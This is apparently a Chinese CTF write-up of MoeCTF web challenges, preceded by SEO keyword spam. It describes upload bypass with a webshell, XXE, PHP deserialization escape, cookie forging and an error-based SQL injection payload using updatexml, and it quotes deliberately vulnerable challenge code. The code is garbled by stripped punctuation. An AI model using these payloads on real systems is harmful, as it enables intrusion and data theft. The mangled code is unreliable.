连锁公司网站源码,vps centos wordpress,2022网页设计尺寸规范和要求,网站开发广告宣传01http 打开题目环境 可以看到要求完成所有任务#xff0c;这里用burp抓个包 按照要求修改可以得到flag moectf{basic_http_knowledge_HJbg427uFuznTqiJdtS1xhZNwpdsOnKU}
02 Web入门指北 直接找到结尾发现乱码#xff0c;去解码 编码可以试试url编码和base64到16
这里用…01http 打开题目环境 可以看到要求完成所有任务这里用burp抓个包 按照要求修改可以得到flag moectf{basic_http_knowledge_HJbg427uFuznTqiJdtS1xhZNwpdsOnKU}
02 Web入门指北 直接找到结尾发现乱码去解码 编码可以试试url编码和base64到16
这里用不到base64解码但是分享一个特别好用的网址
Base64编码转换工具Base64加密解密 (qqxiuzi.cn)
flagbW9lY3Rme3czbENvbWVfVG9fbW9lQ1RGX1cyYl9jaGFsbGVuZ0UhIX0
得到flag
03彼岸的flag 打开页面长这样打字点发送页面有反应用burp抓包点发送不会拦截。所以可能不存在上传这里查看源代码 非常简单的代码审计得到flag moectf{find_comments__HwdtkZ2yRpjPQlJBG0onhIg0X2lWmoy}
04cookies 打开附件是一些api的说明
页面如图这里先抓包 按照附件给的操作试试 这里显示用户已存在
换一个名字 可以注册
继续按照附件操作 登录也是可以的 多次尝试获取flag显示需要登录这时多次出现的token引起我的注意 这里电脑没电了后面我又重开了环境继续做发现token一直是一样的
把token拿去解码 把token用burp发送一遍,发现需要admin。我们去解码网址改一下数据再传入看看 传入得到flag:moectf{cooKi3_is_d3licious_MA9iVff90SSJ!!M6Mrfu9ifxi9i!JGofMJ36D9cPMxro}
05gas!gas!gas! 打开题目因为条件3要求在0.5s内快速反应初步判断要写一个脚本 import requests
import reurl http://localhost:12028/
control 0
throttle 2
data1 {driver: august, steering_control: control, throttle: throttle}pattern r弯道(.*?)(.*?)/fontwith requests.Session() as session:for i in range(7): response session.post(url, datadata1)print(response.text)match re.search(pattern, response.text)if match:if match.group(1) 向左:control 1elif match.group(1) 向右:control -1else:control 0if match.group(2) 抓地力太小了:throttle 0elif match.group(2) 抓地力太大了:throttle 2else:throttle 1data1 {driver: august, steering_control: control, throttle: throttle}else:print(error)break 运行得到flagmoectf{Beautiful_Drifting!!_vsDP9tPr3e0lSCkIMVELPYYwJBEJDN-r}
06moe图床 认为是一个文件上传漏洞
查看源代码发现只准上传png结尾的文件
用burp改后缀
然后用蚁剑试试 这时不用灰心改一下地址试试
成功 找到flagmoectf{hmmm_improper_filter_883hLAj2HD_aK29E7lS-YAFjAK2jhdZc}
07了解你的座驾 弄了半天没头绪 用burp抓包看一下 xml 看起来像是一个xxe题目
试试 得到flagmoectf{Which_one_Youve_Chosen?VZzyn4IjX5cVL3mZng7FE2nfJ9d_duxM}
我这里的代码写的有点扯淡一次试成功了也懒得改了
08大海捞针 题目长这样给的很明确了
用burp爆破 得到flag:moectf{script_helps_ULOZw7NrjEIKRZ4V}
09meo图床 打开是这样的 这里用了会burp 和蚁剑没有结果开始认真审题。
这里用的name传参数有点想法试试
试了试没有直接给flag但是有了线索 用线索试试
一眼看去md5绕过 得到flag:moectf{oops_file_get_contents_controllable_m6Fkl9EmwKrHTPmwEw7ku8euCQ3tToyH}
10夺命十三枪 代码审计一下发现unserialize php反序列化的题
打开一下给的文件看看 这段代码是一个PHP脚本主要功能是将给定的参数传递给Hanxin.exe.php文件中的类和方法进行处理。
代码的执行流程如下
通过highlight_file函数将当前文件的源代码打印出来相当于展示代码给用户看。引入Hanxin.exe.php文件。判断请求中是否存在chant参数如果存在则将其值赋给$Chant变量如果不存在则默认为’夺命十三枪’。创建一个Omg_It_Is_So_Cool_Bring_Me_My_Flag类的实例对象newvisitor并将newvisitor并将Chant作为参数传递进去。使用serialize函数将newvisitor对象序列化成一个字符串并将结果赋给newvisitor对象序列化成一个字符串并将结果赋给before变量。将before字符串作为参数传递给Deadly_Thirteen_Spears类的Make_a_Move方法进行处理并将结果赋给after变量。将处理后的字符串$after打印出来作为用户的动作反馈。使用unserialize函数尝试将$after字符串反序列化成一个对象并打印出结果。如果出现异常Exception则说明代码执行过程中发生了错误打印出相应的错误信息。 这段代码是一个PHP程序主要用于实现两个类Deadly_Thirteen_Spears和Omg_It_Is_So_Cool_Bring_Me_My_Flag。
首先Deadly_Thirteen_Spears类定义了一个私有的静态成员变量Top_Secret_Long_Spear_Techniques_Manual它是一个关联数组包含了十三个“枪”spear和对应的“技巧”movement。Make_a_Move方法用于将传入的参数中与Top_Secret_Long_Spear_Techniques_Manual数组键匹配的部分替换为对应的值并返回替换后的结果。
然后Omg_It_Is_So_Cool_Bring_Me_My_Flag类定义了两个成员变量Chant和Spear_Owner并有一个构造函数用于初始化Chant和Spear_Owner。__toString方法根据SpearOwner的值返回不同的字符串。如果SpearOwner的值返回不同的字符串。如果Spear_Owner不是MaoLei则返回Far away from COOL…否则返回Omg You’re So COOOOOL!!! 以及从环境变量中获取的FLAG值。
整个代码的功能是根据传入的参数替换特定的关键词然后根据$Spear_Owner的值返回不同的字符串。
目的是在夺命十三枪后面修改为;s:11:Spear_Owner;s:6:MaoLei;}该字符串长度为35
di_shi_san_qiang Unrepentant_Lethality每次逃逸5个字符重复7次就行 得到flagmoectf{C00L_b0Y!_56MXZcV8BDqE8Zxn0LkEMGEIHs1HXz7m}
11signin 点了没反应抓包一下看看 看起来像base64编码
解码5次后 猜测是改admin
有个附件打开看看
from secrets import users, salt
import hashlib
import base64
import json
import http.serverwith open(flag.txt,r) as f:FLAG f.read().strip()def gethash(*items):c 0for item in items:if item is None:continuec ^ int.from_bytes(hashlib.md5(f{salt}[{item}]{salt}.encode()).digest(), big) # it looks so complex! but is it safe enough?return hex(c)[2:]assert admin in users
assert users[admin] adminhashed_users dict((k,gethash(k,v)) for k,v in users.items())eval(int.to_bytes(0x636d616f686e69656e61697563206e6965756e63696165756e6320696175636e206975616e6363616361766573206164^8651845801355794822748761274382990563137388564728777614331389574821794036657729487047095090696384065814967726980153,160,big,signedTrue).decode().translate({ord(c):None for c in \x00})) # what is it?def decrypt(data:str):for x in range(5):data base64.b64encode(data).decode() # ummm...? It looks like its just base64 encoding it 5 times? truely?return data__page__ base64.b64encode(PCFET0NUWVBFIGh0bWwCjxodG1sPgo8aGVhZD4KICAgIDx0aXRsZT5zaWduaW48L3RpdGxlPgogICAgPHNjcmlwdD4KICAgICAgICBbXVsoIVtdK1tdKVshK1tdKyEhW10rISFbXV0rKFtdK3t9KVsrISFbXV0rKCEhW10rW10pWyshIVtdXSsoISFbXStbXSlbK1tdXV1bKFtdK3t9KVshK1tdKyEhW10rISFbXSshIVtdKyEhW11dKyhbXSt7fSlbKyEhW11dKyhbXVtbXV0rW10pWyshIVtdXSsoIVtdK1tdKVshK1tdKyEhW10rISFbXV0rKCEhW10rW10pWytbXV0rKCEhW10rW10pWyshIVtdXSsoW11bW11dK1tdKVsrW11dKyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdXSsoISFbXStbXSlbK1tdXSsoW10re30pWyshIVtdXSsoISFbXStbXSlbKyEhW11dXSgoK3t9K1tdKVsrISFbXV0rKCEhW10rW10pWytbXV0rKFtdK3t9KVsrISFbXV0rKFtdK3t9KVshK1tdKyEhW11dKyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10rISFbXV0rW11bKCFbXStbXSlbIStbXSshIVtdKyEhW11dKyhbXSt7fSlbKyEhW11dKyghIVtdK1tdKVsrISFbXV0rKCEhW10rW10pWytbXV1dWyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdXSsoW10re30pWyshIVtdXSsoW11bW11dK1tdKVsrISFbXV0rKCFbXStbXSlbIStbXSshIVtdKyEhW11dKyghIVtdK1tdKVsrW11dKyghIVtdK1tdKVsrISFbXV0rKFtdW1tdXStbXSlbK1tdXSsoW10re30pWyErW10rISFbXSshIVtdKyEhW10rISFbXV0rKCEhW10rW10pWytbXV0rKFtdK3t9KVsrISFbXV0rKCEhW10rW10pWyshIVtdXV0oKCEhW10rW10pWyshIVtdXSsoW11bW11dK1tdKVshK1tdKyEhW10rISFbXV0rKCEhW10rW10pWytbXV0rKFtdW1tdXStbXSlbK1tdXSsoISFbXStbXSlbKyEhW11dKyhbXVtbXV0rW10pWyshIVtdXSsoW10re30pWyErW10rISFbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW11dKyhbXVtbXV0rW10pWytbXV0rKFtdW1tdXStbXSlbKyEhW11dKyhbXVtbXV0rW10pWyErW10rISFbXSshIVtdXSsoIVtdK1tdKVshK1tdKyEhW10rISFbXV0rKFtdK3t9KVshK1tdKyEhW10rISFbXSshIVtdKyEhW11dKygre30rW10pWyshIVtdXSsoW10rW11bKCFbXStbXSlbIStbXSshIVtdKyEhW11dKyhbXSt7fSlbKyEhW11dKyghIVtdK1tdKVsrISFbXV0rKCEhW10rW10pWytbXV1dWyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdXSsoW10re30pWyshIVtdXSsoW11bW11dK1tdKVsrISFbXV0rKCFbXStbXSlbIStbXSshIVtdKyEhW11dKyghIVtdK1tdKVsrW11dKyghIVtdK1tdKVsrISFbXV0rKFtdW1tdXStbXSlbK1tdXSsoW10re30pWyErW10rISFbXSshIVtdKyEhW10rISFbXV0rKCEhW10rW10pWytbXV0rKFtdK3t9KVsrISFbXV0rKCEhW10rW10pWyshIVtdXV0oKCEhW10rW10pWyshIVtdXSsoW11bW11dK1tdKVshK1tdKyEhW10rISFbXV0rKCEhW10rW10pWytbXV0rKFtdW1tdXStbXSlbK1tdXSsoISFbXStbXSlbKyEhW11dKyhbXVtbXV0rW10pWyshIVtdXSsoW10re30pWyErW10rISFbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW11dKyghW10rW10pWyErW10rISFbXV0rKFtdK3t9KVsrISFbXV0rKFtdK3t9KVshK1tdKyEhW10rISFbXSshIVtdKyEhW11dKygre30rW10pWyshIVtdXSsoISFbXStbXSlbK1tdXSsoW11bW11dK1tdKVshK1tdKyEhW10rISFbXSshIVtdKyEhW11dKyhbXSt7fSlbKyEhW11dKyhbXVtbXV0rW10pWyshIVtdXSkoIStbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10pKVshK1tdKyEhW10rISFbXV0rKFtdW1tdXStbXSlbIStbXSshIVtdKyEhW11dKSghK1tdKyEhW10rISFbXSshIVtdKShbXVsoIVtdK1tdKVshK1tdKyEhW10rISFbXV0rKFtdK3t9KVsrISFbXV0rKCEhW10rW10pWyshIVtdXSsoISFbXStbXSlbK1tdXV1bKFtdK3t9KVshK1tdKyEhW10rISFbXSshIVtdKyEhW11dKyhbXSt7fSlbKyEhW11dKyhbXVtbXV0rW10pWyshIVtdXSsoIVtdK1tdKVshK1tdKyEhW10rISFbXV0rKCEhW10rW10pWytbXV0rKCEhW10rW10pWyshIVtdXSsoW11bW11dK1tdKVsrW11dKyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdXSsoISFbXStbXSlbK1tdXSsoW10re30pWyshIVtdXSsoISFbXStbXSlbKyEhW11dXSgoISFbXStbXSlbKyEhW11dKyhbXVtbXV0rW10pWyErW10rISFbXSshIVtdXSsoISFbXStbXSlbK1tdXSsoW11bW11dK1tdKVsrW11dKyghIVtdK1tdKVsrISFbXV0rKFtdW1tdXStbXSlbKyEhW11dKyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10rISFbXV0rKFtdW1tdXStbXSlbIStbXSshIVtdKyEhW11dKyghW10rW10pWyErW10rISFbXSshIVtdXSsoW10re30pWyErW10rISFbXSshIVtdKyEhW10rISFbXV0rKCt7fStbXSlbKyEhW11dKyhbXStbXVsoIVtdK1tdKVshK1tdKyEhW10rISFbXV0rKFtdK3t9KVsrISFbXV0rKCEhW10rW10pWyshIVtdXSsoISFbXStbXSlbK1tdXV1bKFtdK3t9KVshK1tdKyEhW10rISFbXSshIVtdKyEhW11dKyhbXSt7fSlbKyEhW11dKyhbXVtbXV0rW10pWyshIVtdXSsoIVtdK1tdKVshK1tdKyEhW10rISFbXV0rKCEhW10rW10pWytbXV0rKCEhW10rW10pWyshIVtdXSsoW11bW11dK1tdKVsrW11dKyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdXSsoISFbXStbXSlbK1tdXSsoW10re30pWyshIVtdXSsoISFbXStbXSlbKyEhW11dXSgoISFbXStbXSlbKyEhW11dKyhbXVtbXV0rW10pWyErW10rISFbXSshIVtdXSsoISFbXStbXSlbK1tdXSsoW11bW11dK1tdKVsrW11dKyghIVtdK1tdKVsrISFbXV0rKFtdW1tdXStbXSlbKyEhW11dKyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10rISFbXV0rKCFbXStbXSlbIStbXSshIVtdXSsoW10re30pWyshIVtdXSsoW10re30pWyErW10rISFbXSshIVtdKyEhW10rISFbXV0rKCt7fStbXSlbKyEhW11dKyghIVtdK1tdKVsrW11dKyhbXVtbXV0rW10pWyErW10rISFbXSshIVtdKyEhW10rISFbXV0rKFtdK3t9KVsrISFbXV0rKFtdW1tdXStbXSlbKyEhW11dKSghK1tdKyEhW10rISFbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10rISFbXSkpWyErW10rISFbXSshIVtdXSsoW11bW11dK1tdKVshK1tdKyEhW10rISFbXV0pKCErW10rISFbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10pKChbXSt7fSlbK1tdXSlbK1tdXSsoIStbXSshIVtdKyEhW10rW10pKyhbXVtbXV0rW10pWyErW10rISFbXV0pKyhbXSt7fSlbIStbXSshIVtdKyEhW10rISFbXSshIVtdKyEhW10rISFbXV0rKFtdK3t9KVshK1tdKyEhW11dKyghIVtdK1tdKVsrW11dKyhbXSt7fSlbKyEhW11dKygre30rW10pWyshIVtdXSkoIStbXSshIVtdKyEhW10rISFbXSkKICAgICAgICB2YXIgXzB4ZGI1ND1bJ3N0cmluZ2lmeScsJ2xvZycsJ3Bhc3N3b3JkJywnL2xvZ2luJywnUE9TVCcsJ2dldEVsZW1lbnRCeUlkJywndGhlbiddO3ZhciBfMHg0ZTVhPWZ1bmN0aW9uKF8weGRiNTRmYSxfMHg0ZTVhOTQpe18weGRiNTRmYT1fMHhkYjU0ZmEtMHgwO3ZhciBfMHg0ZDhhNDQ9XzB4ZGI1NFtfMHhkYjU0ZmFdO3JldHVybiBfMHg0ZDhhNDQ7fTt3aW5kb3dbJ2FwaV9iYXNlJ109Jyc7ZnVuY3Rpb24gbG9naW4oKXtjb25zb2xlW18weDRlNWEoJzB4MScpXSgnbG9naW4nKTt2YXIgXzB4NWYyYmViPWRvY3VtZW50W18weDRlNWEoJzB4NScpXSgndXNlcm5hbWUnKVsndmFsdWUnXTt2YXIgXzB4NGZkMjI2PWRvY3VtZW50W18weDRlNWEoJzB4NScpXShfMHg0ZTVhKCcweDInKSlbJ3ZhbHVlJ107dmFyIF8weDFjNjFkOT1KU09OW18weDRlNWEoJzB4MCcpXSh7J3VzZXJuYW1lJzpfMHg1ZjJiZWIsJ3Bhc3N3b3JkJzpfMHg0ZmQyMjZ9KTt2YXIgXzB4MTBiOThlPXsncGFyYW1zJzphdG9iKGF0b2IoYXRvYihhdG9iKGF0b2IoXzB4MWM2MWQ5KSkpKSl9O2ZldGNoKHdpbmRvd1snYXBpX2Jhc2UnXStfMHg0ZTVhKCcweDMnKSx7J21ldGhvZCc6XzB4NGU1YSgnMHg0JyksJ2JvZHknOkpTT05bXzB4NGU1YSgnMHgwJyldKF8weDEwYjk4ZSl9KVtfMHg0ZTVhKCcweDYnKV0oZnVuY3Rpb24oXzB4Mjk5ZDRkKXtjb25zb2xlW18weDRlNWEoJzB4MScpXShfMHgyOTlkNGQpO30pO30KICAgIDwvc2NyaXB0Pgo8L2hlYWQCjxib2R5PgogICAgPGgxPmV6U2lnbmluPC9oMT4KICAgIDxwPlNpZ24gaW4gdG8geW91ciBhY2NvdW50PC9wPgogICAgPHAZGVmYXVsdCB1c2VybmFtZSBhbmQgcGFzc3dvcmQgaXMgYWRtaW4gYWRtaW48L3ACiAgICA8cD5Hb29kIEx1Y2shPC9wPgoKICAgIDxwPgogICAgICAgIHVzZXJuYW1lIDxpbnB1dCBpZD0idXNlcm5hbWUiPgogICAgPC9wPgogICAgPHACiAgICAgICAgcGFzc3dvcmQgPGlucHV0IGlkPSJwYXNzd29yZCIgdHlwZT0icGFzc3dvcmQiPgogICAgPC9wPgogICAgPGJ1dHRvbiBpZCA9ICJsb2dpbiICiAgICAgICAgTG9naW4KICAgIDwvYnV0dG9uPgo8L2JvZHkCjxzY3JpcHQCiAgICBjb25zb2xlLmxvZygiaGVsbG8/IikKICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJsb2dpbiIpLmFkZEV2ZW50TGlzdGVuZXIoImNsaWNrIiwgbG9naW4pOwo8L3NjcmlwdD4KPC9odG1sPg)class MyHandler(http.server.BaseHTTPRequestHandler):def do_GET(self):try:if self.path /:self.send_response(200)self.end_headers()self.wfile.write(__page__)else:self.send_response(404)self.end_headers()self.wfile.write(b404 Not Found)except Exception as e:print(e)self.send_response(500)self.end_headers()self.wfile.write(b500 Internal Server Error)def do_POST(self):try:if self.path /login:body self.rfile.read(int(self.headers.get(Content-Length)))payload json.loads(body)params json.loads(decrypt(payload[params]))print(params)if params.get(username) admin:self.send_response(403)self.end_headers()self.wfile.write(bYOU CANNOT LOGIN AS ADMIN!)print(admin)returnif params.get(username) params.get(password):self.send_response(403)self.end_headers()self.wfile.write(bYOU CANNOT LOGIN WITH SAME USERNAME AND PASSWORD!)print(same)returnhashed gethash(params.get(username),params.get(password))for k,v in hashed_users.items():if hashed v:data {user:k,hash:hashed,flag: FLAG if k admin else flag{YOU_HAVE_TO_LOGIN_IN_AS_ADMIN_TO_GET_THE_FLAG}}self.send_response(200)self.end_headers()self.wfile.write(json.dumps(data).encode())print(success)returnself.send_response(403)self.end_headers()self.wfile.write(bInvalid username or password)else:self.send_response(404)self.end_headers()self.wfile.write(b404 Not Found)except Exception as e:print(e)self.send_response(500)self.end_headers()self.wfile.write(b500 Internal Server Error)if __name__ __main__:server http.server.HTTPServer((, 9999), MyHandler)server.serve_forever()
然后我当时做的时候{username:admin,password:admin} 觉得肯定要改admin
然后试了试成功了
这里先将admin和admin全改成1然后
改成 {username:1,password:2} 试了几次发现改成 {username:1,password:1}可以得到flagmoectf{C0nGUrAti0ns!_y0U_hAve_sUCCessFUlly_siGnin!_iYlJf!M3rux9G9Vf!Jox} 12出去旅游的心海
这题一觉起来比赛结束了找不到环境了大概口述一下等能复现了补上
sql注入先f12会得到一个.php,打开可以看到代码
代码是网上搜的
?php
/*
Plugin Name: Visitor auto recorder
Description: Automatically record visitors identification, still in development, do not use in industry environment!
Author: KoKoMiStill in development! :)
*/// 不许偷看这些代码我还在调试呢
highlight_file(__FILE__);// 加载数据库配置暂时用硬编码绝对路径
require_once(/var/www/html/wordpress/ . wp-config.php);$db_user DB_USER; // 数据库用户名
$db_password DB_PASSWORD; // 数据库密码
$db_name DB_NAME; // 数据库名称
$db_host DB_HOST; // 数据库主机// 我记得可以用wp提供的global $wpdb来操作数据库等旅游回来再研究一下
// 这些是临时的代码$ip $_POST[ip];
$user_agent $_POST[user_agent];
$time stripslashes($_POST[time]);$mysqli new mysqli($db_host, $db_user, $db_password, $db_name);// 检查连接是否成功
if ($mysqli-connect_errno) {echo 数据库连接失败: . $mysqli-connect_error;exit();
}$query INSERT INTO visitor_records (ip, user_agent, time) VALUES ($ip, $user_agent, $time);// 执行插入
$result mysqli_query($mysqli, $query);// 检查插入是否成功
if ($result) {echo 数据插入成功;
} else {echo 数据插入失败: . mysqli_error($mysqli);
}// 关闭数据库连接
mysqli_close($mysqli);像是一个显错注入用updatamxl试试用sqlmap也行但是我sqlmap有点问题
查表名库名等后
1 and updatexml(1,substring(concat(0x7e,(select group_concat(content,0x7e,id) from secret_of_kokomi)),30,40),1)
大概代码就是这种就可以得到flag
